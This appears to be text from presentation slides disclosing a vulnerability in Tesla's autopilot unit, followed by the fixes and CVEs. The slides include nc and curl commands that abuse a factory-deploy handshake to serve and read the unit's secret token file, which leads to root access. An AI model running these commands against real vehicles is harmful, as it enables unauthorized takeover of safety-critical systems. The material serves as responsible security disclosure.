  • 78. • Override handshake JSON • Used by install do_m3_factory_deploy(..., command_line, ...) { dispatch_command("override_handshake {" command_line_argument "}"); } do_install(...) { do_serve("serve start " + handshake_json["self_serve"] ); } serve arbitrary file on http server
  • 79. echo -ne "m3-factory-deploy "self_serve":"/var/etc/saccess/tesla1"nexitn"|nc $APE $PORT_CMD > /dev/null sleep 5 echo -ne "install http://8.8.8.8:8888/8888nexitn" | nc $APE $PORT_CMD > /dev/null curl $APE:$PORT_HTTP/var/etc/saccess/tesla1
  • 80. • auth with password from tesla1 • Execute system command with root privilege • Permit root to login via ssh
  • 81. • How • m3_factory_deploy() forbided on APE • check forbidden directories in do_serve() • Fixed in mid 2017 • Vulnerability exists for less than one month
  • 82. 1. 2. 3. 4. 5. Root APE from CID Bypass Code Signing Protection OTA Overview Easter Egg Hack into CID
  • 84. • Quickly fixed in few days • CVE-2017-9983: Gateway code sign protection bypass • CVE-2017-6261: Nvmap kernel local privilege escalation
  • 85. • iptables • More strictly • cid-updater/ape-updater • Lots of bug fixed • saccess token no longer used as passwords • System upgrade • Can not rollback